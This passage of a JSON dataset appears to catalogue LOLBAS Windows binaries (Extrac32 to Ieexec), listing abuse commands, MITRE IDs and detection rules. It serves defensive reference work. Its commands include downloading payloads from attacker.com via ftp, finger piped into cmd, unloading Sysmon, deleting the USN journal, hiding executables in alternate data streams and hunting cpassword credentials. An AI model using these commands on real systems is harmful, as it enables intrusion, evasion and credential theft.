installation","aliases":[]},{"id":"lolbas:extrac32-exe:3","toolId":"lolbas:extrac32-exe","toolName":"Extrac32.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}","description":"Command for copying file from one folder to another","usecase":"Copy file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\extrac32.exe","C:\\Windows\\SysWOW64\\extrac32.exe"],"toolType":"Binary","detection":[{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://twitter.com/egre55/status/985994639202283520","https://lolbas-project.github.io/lolbas/Binaries/Extrac32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:0","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.","usecase":"Add a file to an alternate data stream to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:1","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.","usecase":"Add a file to an alternate data stream from a webdav server to hide from defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:2","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Credentials","source":"LOLBAS","platform":["Windows"],"capability":["Credential Access"],"nativeCategory":["Credentials"],"command":"findstr /S /I cpassword \\\\sysvol\\policies\\*.xml","description":"Search for stored password in Group Policy files stored on SYSVOL.","usecase":"Find credentials stored in cpassword attrbute","mitre":["T1552.001"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:findstr-exe:3","toolId":"lolbas:findstr-exe","toolName":"Findstr.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}","description":"Searches for the string W3AllLov3LolBas, since it does not exist (/V) file.exe is downloaded to the target file.","usecase":"Download/Copy file from webdav server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\findstr.exe","C:\\Windows\\SysWOW64\\findstr.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml"}],"references":["https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Findstr/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:finger-exe:0","toolId":"lolbas:finger-exe","toolName":"Finger.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"finger user@example.host.com | more +2 | cmd","description":"Downloads payload from remote Finger server. This example connects to \"example.host.com\" asking for user \"user\"; the result could contain malicious shellcode which is executed by the cmd process.","usecase":"Download malicious payload","mitre":["T1105"],"privilege":"user","fullPath":["c:\\windows\\system32\\finger.exe","c:\\windows\\syswow64\\finger.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml"},{"type":"IOC","value":"finger.exe should not be run on a normal workstation."},{"type":"IOC","value":"finger.exe connecting to external resources."}],"references":["https://twitter.com/DissectMalware/status/997340270273409024","https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)","https://lolbas-project.github.io/lolbas/Binaries/Finger/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fltmc-exe:0","toolId":"lolbas:fltmc-exe","toolName":"fltMC.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fltMC.exe unload SysmonDrv","description":"Unloads a driver used by security agents","usecase":"Defense evasion","mitre":["T1562.001"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\fltMC.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml"},{"type":"IOC","value":"4688 events with fltMC.exe"}],"references":["https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon","https://lolbas-project.github.io/lolbas/Binaries/fltMC/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:forfiles-exe:0","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{CMD}\"","description":"Executes specified command since there is a match for notepad.exe in the c:\\windows\\System32 folder.","usecase":"Use forfiles to start a new process to evade defensive counter measures","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:forfiles-exe:1","toolId":"lolbas:forfiles-exe","toolName":"Forfiles.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"forfiles /p c:\\windows\\system32 /m notepad.exe /c \"{PATH_ABSOLUTE}:evil.exe\"","description":"Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.","usecase":"Use forfiles to start a new process from a binary hidden in an alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\forfiles.exe","C:\\Windows\\SysWOW64\\forfiles.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml"}],"references":["https://twitter.com/vector_sec/status/896049052642533376","https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/","https://lolbas-project.github.io/lolbas/Binaries/Forfiles/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:0","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}","description":"Zero out a file","usecase":"Can be used to forensically erase a file","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:1","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Tamper","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Tamper"],"command":"fsutil.exe usn deletejournal /d c:","description":"Delete the USN journal volume to hide file creation activity","usecase":"Can be used to hide file creation activity","mitre":["T1485"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:fsutil-exe:2","toolId":"lolbas:fsutil-exe","toolName":"Fsutil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"fsutil.exe trace decode","description":"Executes a pre-planted binary named netsh.exe from the current directory.","usecase":"Spawn a pre-planted executable from fsutil.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\fsutil.exe","C:\\Windows\\SysWOW64\\fsutil.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"fsutil.exe should not be run on a normal workstation"},{"type":"IOC","value":"file setZeroData (not case-sensitive) in the process arguments"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process fsutil.exe with trace decode could be suspicious"},{"type":"IOC","value":"Non-Windows netsh.exe execution"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml"}],"references":["https://twitter.com/0gtweet/status/1720724516324704404","https://lolbas-project.github.io/lolbas/Binaries/Fsutil/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ftp-exe:0","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt","description":"Executes the commands you put inside the text file.","usecase":"Spawn new process using ftp.exe. Ftp.exe runs cmd /C YourCommand","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ftp-exe:1","toolId":"lolbas:ftp-exe","toolName":"Ftp.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"cmd.exe /c \"@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v\"","description":"Download","usecase":"Spawn new process using ftp.exe. Ftp.exe downloads the binary.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\ftp.exe","C:\\Windows\\SysWOW64\\ftp.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml"},{"type":"IOC","value":"cmd /c as child process of ftp.exe"}],"references":["https://twitter.com/0xAmit/status/1070063130636640256","https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939","https://ss64.com/nt/ftp.html","https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/","https://lolbas-project.github.io/lolbas/Binaries/Ftp/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:gpscript-exe:0","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /logon","description":"Executes logon scripts configured in Group Policy.","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:gpscript-exe:1","toolId":"lolbas:gpscript-exe","toolName":"Gpscript.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Gpscript /startup","description":"Executes startup scripts configured in Group Policy","usecase":"Add local group policy logon script to execute file and hide from defensive counter measures","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\gpscript.exe","C:\\Windows\\SysWOW64\\gpscript.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml"},{"type":"IOC","value":"Scripts added in local group policy"},{"type":"IOC","value":"Execution of Gpscript.exe after logon"}],"references":["https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/","https://lolbas-project.github.io/lolbas/Binaries/Gpscript/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:0","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"HH.exe {REMOTEURL:.bat}","description":"Open the target batch script with HTML Help.","usecase":"Download files from url","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:1","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {PATH_ABSOLUTE:.exe}","description":"Executes specified executable with HTML Help.","usecase":"Execute process with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:hh-exe:2","toolId":"lolbas:hh-exe","toolName":"Hh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"HH.exe {REMOTEURL:.chm}","description":"Executes a remote .chm file which can contain commands.","usecase":"Execute commands with HH.exe","mitre":["T1218.001"],"privilege":"user","fullPath":["C:\\Windows\\hh.exe","C:\\Windows\\SysWOW64\\hh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml"}],"references":["https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/","https://lolbas-project.github.io/lolbas/Binaries/Hh/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:imewdbld-exe:0","toolId":"lolbas:imewdbld-exe","toolName":"IMEWDBLD.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe {REMOTEURL}","description":"IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.","usecase":"Download file from Internet","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\IME\\SHARED\\IMEWDBLD.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml"}],"references":["https://twitter.com/notwhickey/status/1367493406835040265","https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ie4uinit-exe:0","toolId":"lolbas:ie4uinit-exe","toolName":"Ie4uinit.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"ie4uinit.exe -BaseSettings","description":"Executes commands from a specially prepared ie4uinit.inf file.","usecase":"Get code execution by copy files to another location","mitre":["T1218"],"privilege":"user","fullPath":["c:\\windows\\system32\\ie4uinit.exe","c:\\windows\\sysWOW64\\ie4uinit.exe","c:\\windows\\system32\\ieuinit.inf","c:\\windows\\sysWOW64\\ieuinit.inf"],"toolType":"Binary","detection":[{"type":"IOC","value":"ie4uinit.exe copied outside of %windir%"},{"type":"IOC","value":"ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml"}],"references":["https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:iediagcmd-exe:0","toolId":"lolbas:iediagcmd-exe","toolName":"iediagcmd.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"set windir=c:\\test& cd \"C:\\Program Files\\Internet Explorer\\\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}","description":"Executes binary that is pre-planted at C:\\test\\system32\\netsh.exe.","usecase":"Spawn a pre-planted executable from iediagcmd.exe.","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Program Files\\Internet Explorer\\iediagcmd.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml"},{"type":"IOC","value":"Sysmon Event ID 1"},{"type":"IOC","value":"Execution of process iediagcmd.exe with /out could be suspicious"}],"references":["https://twitter.com/Hexacorn/status/1507516393859731456","https://lolbas-project.github.io/lolbas/Binaries/iediagcmd/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:ieexec-exe:0","toolId":"lolbas:ieexec-exe","toolName":"Ieexec.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ieexec.exe {REMOTEURL:.exe}","description":"Downloads and executes executable from the remote server.","usecase":"Download and run attacker code from remote location","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ieexec.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ieexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"IOC","value":"Network connections originating from ieexec.exe may be suspicious"}],"references":["https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/","https://lolbas-project.github.io/lolbas/Binaries/Ieexec/"],"requires":[],"services":[],"environment":["Local 